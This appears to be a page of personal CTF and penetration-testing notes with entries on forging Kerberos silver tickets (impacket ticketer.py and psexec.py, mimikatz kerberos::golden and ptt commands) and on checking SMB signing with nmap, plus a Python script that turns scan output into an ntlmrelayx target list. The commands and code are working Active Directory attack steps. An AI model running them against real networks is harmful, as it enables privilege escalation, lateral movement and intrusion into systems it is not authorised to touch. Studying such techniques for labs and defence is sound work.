Silver Ticket

6. Silver ticket: craft a valid TGS (service ticket) for one service after obtaining the NTLM hash of the account that service runs as (for CIFS/HOST/RPCSS on a host that is the computer account's hash; for a service registered to a user account it is that user's hash). The service validates the ticket with its own key and never contacts the KDC, so the forged ticket can name any user and any group membership (max privilege, e.g. RID 500 / Domain Admins), but it grants access to that one service only. Tools: impacket's ticketer.py & psexec.py (Linux), mimikatz & Rubeus (Windows)

Linux

```bash
ticketer.py -domain-sid SID -domain DOMAIN -spn SPN -nthash HASH USERNAME
export KRB5CCNAME=USERNAME.ccache
psexec.py DOMAIN/USERNAME@HOSTNAME -k -no-pass
```

Use the host's name as it appears in the forged SPN (e.g. `cifs/dc01.domain.local`), not a bare IP: impacket derives the service principal from the target string, and a ticket for the wrong SPN will not be found in the ccache. If the name does not resolve, add `-target-ip $IP`.

Windows

```text
.\mimikatz.exe
kerberos::golden /domain:DOMAIN /sid:SID /rc4:HASH /user:USERNAME /service:SPN /target:DCHOSTNAME
kerberos::ptt TICKET.kirbi
```

Here `/service:` is the service class (cifs, host, ldap, ...), `/target:` is the FQDN of the host running it (a DC is only one possible target), and `/rc4:` is the service account's NT hash; `/ptt` on the golden line injects the ticket directly instead of writing a .kirbi. Or use Rubeus to do the same...

January 21, 2025 · 1 min · 80 words

SMB Signing Check

```bash
nmap --script=smb2-security-mode.nse -p445 $IP
```

[[SMB Signing Check.png]]

Note:
1. Message signing enabled and required = cannot relay
2. Message signing disabled, or enabled but not required = can relay

By default, workstations and member servers sit in state #2 (signing enabled but not required); only domain controllers sit in state #1 (required), via the Default Domain Controllers Policy. Windows 11 24H2 and Windows Server 2025 moved the defaults toward requiring signing, so check each host rather than assume. This script only tests SMB2/3; use smb-security-mode.nse for SMB1.
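In practice the check is run across a subnet and the hosts in state #2 are written to a targets file for `ntlmrelayx.py -tf`. This is an added example, not code from the original post: it parses nmap's normal output, classifies each host by the signing line, and emits the relayable IPs. The sample scan output is constructed, and the classifier only assumes the status text contains "required", "not required" or "disabled", which covers the two cases the note above names.

```python
"""Turn `nmap --script=smb2-security-mode -p445` output into a relay target list."""
import re
import subprocess
from typing import Dict, List

# Constructed sample output (not a real scan); hostnames and IPs are made up.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for dc01.corp.local (10.10.10.1)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Nmap scan report for ws01.corp.local (10.10.10.21)
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for 10.10.10.30
Host is up (0.0030s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing disabled

Nmap scan report for 10.10.10.40
Host is up (0.0030s latency).

PORT    STATE SERVICE
445/tcp closed microsoft-ds
"""

# "Nmap scan report for name (ip)" or "Nmap scan report for ip"
HOST_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[^)]+)\))?")
SIGN_RE = re.compile(r"Message signing .*", re.IGNORECASE)


def classify(status_line: str) -> str:
    """Map the script's status text to relayability; 'not required' is tested before 'required'."""
    t = status_line.lower()
    if "not required" in t or "disabled" in t:
        return "relayable"
    if "required" in t:
        return "not relayable"
    return "unknown"


def parse_signing(nmap_text: str) -> Dict[str, str]:
    """IP -> 'relayable' | 'not relayable' | 'unknown' | 'no result' (port closed / no script output)."""
    results: Dict[str, str] = {}
    current = None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group("ip") or m.group("name")
            results[current] = "no result"
            continue
        s = SIGN_RE.search(line)
        if s and current:
            results[current] = classify(s.group(0))
    return results


def relay_targets(nmap_text: str) -> List[str]:
    """Hosts in state #2 (disabled, or enabled but not required), in scan order."""
    return [ip for ip, st in parse_signing(nmap_text).items() if st == "relayable"]


def scan(targets: str) -> str:
    """Run the real check (needs nmap on PATH; not used by the offline demo below)."""
    proc = subprocess.run(["nmap", "--script=smb2-security-mode", "-p445", targets],
                          capture_output=True, text=True, check=True)
    return proc.stdout


if __name__ == "__main__":
    for ip, status in parse_signing(SAMPLE_NMAP_OUTPUT).items():
        print(f"{ip:16} {status}")
    # Lines below are what you would write to targets.txt for: ntlmrelayx.py -tf targets.txt -smb2support
    print("\n".join(relay_targets(SAMPLE_NMAP_OUTPUT)))
```

Hosts that report "no result" had port 445 closed or no script output; they are neither relay targets nor safe, just unscanned for this purpose.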

January 21, 2025 · 1 min · 37 words

Cheatsheet

just a bunch of notes for CTF

October 24, 2024 · 10 min · 2068 words